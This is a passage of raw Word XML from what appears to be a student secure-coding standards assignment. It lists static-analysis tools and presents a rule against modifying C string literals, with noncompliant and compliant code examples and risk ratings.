                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V721</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId37" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V724</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V732</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId39" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V739</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId40" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V784</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId41" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V793</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId42" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V1019</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,  </w:t>
            </w:r>
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V1029</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V1046</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5066A573" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="3DCEA595" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16777DE6" w14:textId="55E8B559" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>RuleChecker</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012591F0" w14:textId="5B81F990" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="195C4C34" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04E41A39" w14:textId="244FE82C"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 via MISRA C:2012 Rules 10.1, 10.3, 10.4, 10.6 and 10.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="147594D2" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B29C15B" w14:textId="288AB82D" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>TrustInSoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Analyzer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BEBA2AB" w14:textId="6CC8682B" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39CC2F19" w14:textId="5F5120F2" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>signed_downcast</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693795AA" w14:textId="4669D056" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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4" w:name="_Toc52464061"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1DB9F538"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43E4753B" w14:textId="4CE529F1" w:rsidR="00381847" w:rsidRDefault="009E1EB8" w:rsidP="004530D6">
            <w:r>
              <w:t xml:space="preserve"> STR</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00610FE2">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>30</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E7240A9" w14:textId="36056A8B" w:rsidR="00381847" w:rsidRDefault="009E1EB8">
            <w:r w:rsidRPr="009E1EB8">
              <w:t>Do not attempt to modify string literals</w:t>
            </w:r>
            <w:r w:rsidR="00D87BA1">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00D87BA1" w:rsidRPr="00D87BA1">
              <w:t>Avoid assigning a string literal to a pointer to non-const or casting a string literal to a pointer to non-const.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31A51ED8"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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992010" w:rsidR="00F72634" w:rsidRDefault="00476F12" w:rsidP="00A72503">
            <w:r w:rsidRPr="00476F12">
              <w:t>In this noncompliant code example,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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56A3A847" w14:textId="77777777" w:rsidR="00476F12" w:rsidRDefault="00476F12" w:rsidP="00476F12">
            <w:r>
              <w:t>char *</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>str  =</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> "string literal";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12374FA0" w14:textId="5F7B7F30" w:rsidR="00F72634" w:rsidRDefault="00476F12" w:rsidP="00476F12">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>str[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>0] = 'S';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0076DC7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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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E9D07C8" w:rsidR="00F72634" w:rsidRDefault="006B1F41" w:rsidP="00A72503">
            <w:r w:rsidRPr="006B1F41">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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1796FFF0" w14:textId="77777777" w:rsidR="006B1F41" w:rsidRDefault="006B1F41" w:rsidP="006B1F41">
            <w:r>
              <w:t xml:space="preserve">char </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>str[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>] = "string literal";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5286DB6F" w14:textId="16E568A4" w:rsidR="00F72634" w:rsidRDefault="006B1F41" w:rsidP="006B1F41">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>str[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>0] = 'S';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="177CC804" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29120604" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Int_GjAd7KlB"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>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4CFB96E" w14:textId="3C584D2D" w:rsidR="007132C7" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="001B26B8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00442D2E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">4. Keep it </w:t>
            </w:r>
            <w:r w:rsidR="00DE434B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Simple: </w:t>
            </w:r>
            <w:r w:rsidR="00B41BD7">
              <w:t xml:space="preserve">By avoiding complex manipulations and ensuring that string literals are not assigned to non-const pointers or cast to non-const, the code remains straightforward and less </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00B41BD7">
              <w:t>error-prone</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00B41BD7">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337D82A6" w14:textId="2D95BF11" w:rsidR="00B475A1" w:rsidRDefault="001B26B8" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008E0F46">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Adopt a Secure Coding Standard</w:t>
            </w:r>
            <w:r w:rsidR="008E0F46">
              <w:t>: This principle is directly relevant because avoiding modification of string literals is a widely recognized best practice in secure coding standards. It helps prevent undefined behavior and potential security vulnerabilities associated with string manipulation.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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BB676B4" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31F4B979" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="147C27E2" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A12C32B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="404C4507" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0264479C" w14:textId="075927CD" w:rsidR="00B475A1" w:rsidRDefault="009025AB" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BDC13" w14:textId="711747E5" w:rsidR="00B475A1" w:rsidRDefault="000564D7" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D6ABC8" w14:textId="6B128808" w:rsidR="00B475A1" w:rsidRDefault="000564D7" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D88F132" w14:textId="7CAAC6BA" w:rsidR="00B475A1" w:rsidRDefault="000564D7" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1999E754" w14:textId="6FDC20D1" w:rsidR="00B475A1" w:rsidRDefault="000564D7"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4111CD08" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62F37A34" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31A415FA" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
